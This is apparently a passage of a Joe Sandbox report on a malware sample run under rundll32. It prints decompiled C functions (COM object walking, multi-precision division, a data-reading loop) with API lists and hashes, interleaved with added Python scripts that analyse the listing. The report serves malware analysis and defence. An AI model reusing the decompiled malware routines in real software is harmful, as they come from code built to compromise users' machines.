                                                  							_t26 = _t107 + 0x10; // 0x3d04f4c0
                                                  							E04F4A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E04F49039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E04F49039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E04F4A8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0x4f4d33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
                                                  			}

                                                  APIs
                                                  • StrChrA.SHLWAPI(04F43C81,0000005F,00000000,00000000,00000104), ref: 04F41808
                                                  • lstrcpy.KERNEL32(?,?), ref: 04F41835
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                    • Part of subcall function 04F42659: lstrlenW.KERNEL32(04F43C81,?,?,04F419A9,3D04F4C0,80000002,04F43C81,04F48B1E,74666F53,4D4C4B48,04F48B1E,?,3D04F4C0,80000002,04F43C81,?), ref: 04F42679
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 04F41857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: c6ab69a21bb928d5e6b49b4aa54dab6565b20334bfe389ad07000d70eaf9c192
                                                  • Instruction ID: 6414a564a877bb97451b7de80584bd7381c09f14d047ada10a121e47ef15ed18
                                                  • Opcode Fuzzy Hash: c6ab69a21bb928d5e6b49b4aa54dab6565b20334bfe389ad07000d70eaf9c192
                                                  • Instruction Fuzzy Hash: C7515E7660020DFFEF21AFA4DE44EAA3BBAEF88354F008515FA1592150EF35E956DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E04F452F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t5 = _t102 + 0x4f4e038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0x4f4c2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0x4f4d27c; // 0x212a5a8
                                                  												_t28 = _t108 + 0x4f4e0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0x4f4d27c; // 0x212a5a8
                                                  														_t33 = _t78 + 0x4f4e078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
                                                  			}

Instruction address column (one entry per listing line, detached from the C-code during extraction): 0x04f452fe to 0x04f4548b; 0x00000000 entries are listing lines with no instruction address.

                                                  APIs
                                                  • SysAllocString.OLEAUT32(04F4C2B0), ref: 04F45349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F4542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F45444
                                                  • SysFreeString.OLEAUT32(?), ref: 04F45473
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: aa2e12770ff26bfd9b0dc974c7581d9dde0ec78f13ff88a189b864b43e9fa410
                                                  • Instruction ID: d048eeaca09e2047406b717bd8182b072c85c4518d0701503f4a4de1ba6e7888
                                                  • Opcode Fuzzy Hash: aa2e12770ff26bfd9b0dc974c7581d9dde0ec78f13ff88a189b864b43e9fa410
                                                  • Instruction Fuzzy Hash: 9F515175D00519EFCB00DFA8C8989AEB7B9EFC9705B144584E915EB320DB31AD42CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
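The function tail above is pure COM: slot 0 of `_t69`'s vtable is called as `(this, riid, ppv)`, which is `IUnknown::QueryInterface`; the `+8` calls with only `this` are `IUnknown::Release`; the `+0x34` call that returns a BSTR (later passed to `lstrcmpW` and `SysFreeString`) and the `+0x114` call are methods of whatever interface `_t28` names, and that IID is only an address in this excerpt, so they cannot be named from the listing alone. The script below is an added example by the editor, not code from the sample or from Joe Sandbox: it scans decompiler text for those indirect calls, resolves the slot index (offset / 4 on this 32-bit sample, slots 0 to 2 fixed by IUnknown) and parses the report's `APIs` block into a call-site table. The input lines are copied from the listing above; the helper names, the `POINTER_SIZE` constant and the decoding of the `0076006F` argument as the first two UTF-16 code units at the string pointer (the same value the listing annotates as `// 0x76006f`) are the editor's, not the report's.

```python
import re

# Added example (editor's tooling, not code from the sample or from Joe Sandbox):
# pull the indirect vtable calls out of a decompiled listing and resolve the
# slot index, and parse the report's "APIs" bullet lines. The excerpt below is
# copied from the listing above (E04F452F9) and serves as the sample input.
LISTING = r"""
_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
 *((intOrPtr*)( *_t82 + 0x114))(_t82);
 *((intOrPtr*)( *_t76 + 8))(_t76);
 *((intOrPtr*)( *_t71 + 8))(_t71);
"""

API_LINES = """
• SysAllocString.OLEAUT32(04F4C2B0), ref: 04F45349
• lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F4542B
• SysFreeString.OLEAUT32(00000000), ref: 04F45444
"""

POINTER_SIZE = 4  # the sample is a 32-bit PE (run under 32-bit rundll32.exe)

# Every COM interface starts with IUnknown, so these three slots are fixed.
IUNKNOWN = {0: "QueryInterface", 1: "AddRef", 2: "Release"}

# Matches the decompiler's spelling of `(*this)->vtable[slot](...)`:
#   *((intOrPtr*)( *_tNN + OFFSET))(      or      *((intOrPtr*)( *_tNN))(
VTABLE_CALL = re.compile(
    r"\*\(\(intOrPtr\*\)\(\s*\*(_t\d+)(?:\s*\+\s*(0x[0-9A-Fa-f]+|\d+))?\s*\)\)\(")

# Matches one "• Api.Module(arg,arg), ref: ADDR" line of the APIs block.
API_REF = re.compile(r"•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def vtable_calls(text, pointer_size=POINTER_SIZE):
    """List the vtable calls in a decompiled listing with their slot index.

    slot = offset / pointer_size; slots 0-2 are IUnknown methods, anything
    above that must be looked up in the interface the preceding
    QueryInterface asked for (the IID is not recoverable from the excerpt).
    """
    calls = []
    for m in VTABLE_CALL.finditer(text):
        var, off = m.group(1), m.group(2)
        offset = int(off, 0) if off else 0
        slot = offset // pointer_size
        calls.append({"this": var, "offset": offset, "slot": slot,
                      "name": IUNKNOWN.get(slot)})
    return calls


def api_refs(text):
    """Parse the report's APIs block into (api, module, args, call site)."""
    refs = []
    for api, module, args, ref in API_REF.findall(text):
        refs.append({"api": api, "module": module,
                     "args": [a for a in args.split(",") if a],
                     "ref": int(ref, 16)})
    return refs


def wide_prefix(arg_hex):
    """Decode the dword the report prints for a wide-string argument.

    For string parameters the report shows the first four bytes at the
    pointer (the listing annotates the same value as `// 0x76006f`), i.e. the
    first two UTF-16LE code units, not the pointer itself.
    """
    return int(arg_hex, 16).to_bytes(4, "little").decode("utf-16-le")


if __name__ == "__main__":
    for c in vtable_calls(LISTING):
        print(f"{c['this']}: vtable+0x{c['offset']:x} -> slot {c['slot']} "
              f"{c['name'] or '(look up in the queried interface)'}")
    for r in api_refs(API_LINES):
        print(f"{r['ref']:08X} {r['module']}!{r['api']} {r['args']}")
    print(repr(wide_prefix("0076006F")))
```

Running it against the excerpt gives slots 0, 13, 69, 2, 2 for the five calls, and `wide_prefix("0076006F")` returns `"ov"`, which is all the listing reveals about the string `lstrcmpW` compares against: its first two characters.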

                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 04F41680
                                                  • SysFreeString.OLEAUT32(?), ref: 04F41763
                                                    • Part of subcall function 04F452F9: SysAllocString.OLEAUT32(04F4C2B0), ref: 04F45349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 04F417B7
                                                  • SysFreeString.OLEAUT32(?), ref: 04F417C5
                                                    • Part of subcall function 04F42436: Sleep.KERNEL32(000001F4), ref: 04F4247E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: a8e276a71b86b21a0b6371096551d3f1a0ec51af6da33ca9b2dfd68b99dd7b63
                                                  • Instruction ID: 110094c261507235232dd1a2aaa7c05fe53e3e2689844260d3352969559785e6
                                                  • Opcode Fuzzy Hash: a8e276a71b86b21a0b6371096551d3f1a0ec51af6da33ca9b2dfd68b99dd7b63
                                                  • Instruction Fuzzy Hash: 00515776900209EFDB10DFE8C98889EBBB6FFC8350B158969E515DB210DB35AD46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E04F41017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E04F4A7AA(_a16, _t92);
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
                                                  					_t97 = _t96 - _t81;
                                                  					_v12 = _t96 - _t81;
                                                  					E04F4968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04F48967(_t101,  &_v236, _a8, _t96 - _t81);
                                                  					E04F48967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                  					_t66 = E04F4968F(_t101, 0x4f4d1b0);
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E04F4968F(_a16, _a4);
                                                  						E04F41D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c);
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L04F4B0C8();
                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L04F4B0C2();
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff;
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E04F41FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E04F48B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E04F49100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(0x4f4d1b0 + _a8 * 4) = _t66;
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
                                                  			}

Instruction address column (one entry per listing line, detached from the C-code during extraction): 0x04f4101a to 0x04f41196; 0x00000000 entries are listing lines with no instruction address.

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F410C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F410DA
                                                  • memset.NTDLL ref: 04F4117A
                                                  • memset.NTDLL ref: 04F4118A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 94a40be5b50b8c99547e5a4e16a8e4f535a471b4b7a859c26416d9698e84bbde
                                                  • Instruction ID: 4882c9de3e6c7978ae6246018997713dd941d4c6800e0c039dd73d056d0c7752
                                                  • Opcode Fuzzy Hash: 94a40be5b50b8c99547e5a4e16a8e4f535a471b4b7a859c26416d9698e84bbde
                                                  • Instruction Fuzzy Hash: C341A471A00259ABEB10DFA8DD44BEE7F78EFC4314F008529E915A7280DF70B9868B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
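E04F41017 above reads as a schoolbook multi-precision division on 32-bit words: the `_t56 >> 1` loop counts the bits of the divisor's leading word and `0x20` minus that count is the normalization shift kept in `_v12`; the `_allmul`/`_aulldiv` pair computes (top two dividend words) divided by (top divisor word `_v8` + 1), clamped to `0xffffffff`, with `_v8 == 0xffffffff` taking the shortcut of using the top dividend word directly; the inner `while` corrects that underestimate by subtracting the divisor again and incrementing `_a12`; quotient words are stored at `0x4f4d1b0 + _a8 * 4`, the shifted remainder goes to `_a4`, and both stack buffers (0x8c and 0x44 bytes) are zeroed with `memset` before returning. The Python below is an added example by the editor implementing that shape, not the sample's code and not a decompilation of it: the little-endian word order (index 0 least significant), the helper names and the `divmod_int` wrapper are the editor's assumptions for illustration.

```python
# Added example (editor's reconstruction of the division pattern seen in
# E04F41017, not the sample's code): schoolbook division of base-2^32 word
# arrays, little-endian word order (index 0 least significant, an assumption).
WORD_BITS = 32
BASE = 1 << WORD_BITS
MASK = BASE - 1


def bit_length32(w):
    """Bit count of a 32-bit word, the way the `_t56 >> 1` loop computes it."""
    n = 0
    while w and n < WORD_BITS:
        w >>= 1
        n += 1
    return n


def to_words(x, n):
    return [(x >> (WORD_BITS * i)) & MASK for i in range(n)]


def from_words(ws):
    return sum(w << (WORD_BITS * i) for i, w in enumerate(ws))


def mulsub(u, j, v, q):
    """u[j .. j+len(v)] -= q * v in place; return the final borrow."""
    carry = borrow = 0
    for i, vi in enumerate(v):
        p = q * vi + carry
        carry = p >> WORD_BITS
        t = u[j + i] - (p & MASK) - borrow
        u[j + i] = t & MASK
        borrow = 1 if t < 0 else 0
    t = u[j + len(v)] - carry - borrow
    u[j + len(v)] = t & MASK
    return 1 if t < 0 else 0


def ge_words(u, j, v):
    """u[j .. j+len(v)-1] >= v, comparing from the most significant word."""
    for i in range(len(v) - 1, -1, -1):
        if u[j + i] != v[i]:
            return u[j + i] > v[i]
    return True


def sub_words(u, j, v):
    """u[j .. j+len(v)-1] -= v in place; return the borrow out."""
    borrow = 0
    for i, vi in enumerate(v):
        t = u[j + i] - vi - borrow
        u[j + i] = t & MASK
        borrow = 1 if t < 0 else 0
    return borrow


def divmod_words(u_words, v_words):
    """Return (quotient words, remainder words) for little-endian word arrays."""
    v = list(v_words)
    while len(v) > 1 and v[-1] == 0:
        v.pop()
    if v == [0]:
        raise ZeroDivisionError
    u = list(u_words)
    n, m = len(u), len(v)
    if n < m:                       # dividend shorter than divisor: q = 0, r = u
        return [0] * n, u
    s = WORD_BITS - bit_length32(v[-1])        # normalization shift (cf. _v12)
    un = to_words(from_words(u) << s, n + 1)   # shifted dividend, one extra word
    vn = to_words(from_words(v) << s, m)       # shifted divisor, top bit set
    vtop = vn[-1]
    q = [0] * (n - m + 1)
    for j in range(n - m, -1, -1):
        if vtop != MASK:
            # (top two dividend words) / (top divisor word + 1): never too large
            qhat = ((un[j + m] << WORD_BITS) | un[j + m - 1]) // (vtop + 1)
            qhat = min(qhat, MASK)
        else:
            qhat = un[j + m]        # the shortcut branch for _v8 == 0xffffffff
        mulsub(un, j, vn, qhat)     # cannot borrow because qhat <= true digit
        # Correct the underestimate: keep subtracting v while the window >= v.
        while un[j + m] != 0 or ge_words(un, j, vn):
            qhat += 1
            un[j + m] = (un[j + m] - sub_words(un, j, vn)) & MASK
        q[j] = qhat
    rem = to_words(from_words(un[:m]) >> s, m)   # undo the normalization
    return q, rem


def divmod_int(a, b):
    """Convenience wrapper for checking the word routine against Python's divmod."""
    n = max(1, (a.bit_length() + WORD_BITS - 1) // WORD_BITS)
    m = max(1, (b.bit_length() + WORD_BITS - 1) // WORD_BITS)
    q, r = divmod_words(to_words(a, n), to_words(b, m))
    return from_words(q), from_words(r)
```

Estimating with the divisor's top word plus one guarantees the digit is never too large, so the only fix-up ever needed is the forward correction loop (a handful of extra subtractions at most), which is why the listing has no add-back path; the cost is the second subtraction routine, E04F49100, being called in a loop.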

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04F4A9BD
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • ResetEvent.KERNEL32(?), ref: 04F4AA31
                                                  • GetLastError.KERNEL32 ref: 04F4AA54
                                                  • GetLastError.KERNEL32 ref: 04F4AAFF
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 135f95c28f4512b96bd2ee8082a5e9e771ff890cc8b7723bddfe728a51c8079b
                                                  • Instruction ID: 703c0161c5d927aed2d32e78b8cde1c94f55af09b3c1660668bb904b782121e5
                                                  • Opcode Fuzzy Hash: 135f95c28f4512b96bd2ee8082a5e9e771ff890cc8b7723bddfe728a51c8079b
                                                  • Instruction Fuzzy Hash: 3A418D75A40248BBE7309FB5DC48EAB7EBDEBD5704B004929F552E1090EF75A986CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E04F439BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c));
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0x4f4d134() != 0) {
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0x4f4d168(0, 1,  &_v12);
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E04F42049(0x1000);
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0x4f4d134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) {
                                                  							L15:
                                                  							E04F49039(_v16);
                                                  							if(_t58 == 0) {
                                                  								_t58 = E04F47A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E04F41C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) {
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E04F41C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 04F439D5
                                                  • GetLastError.KERNEL32 ref: 04F439EE
                                                    • Part of subcall function 04F41C47: WaitForMultipleObjects.KERNEL32(00000002,04F4AA72,00000000,04F4AA72,?,?,?,04F4AA72,0000EA60), ref: 04F41C62
                                                  • ResetEvent.KERNEL32(?), ref: 04F43A67
                                                  • GetLastError.KERNEL32 ref: 04F43A82
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
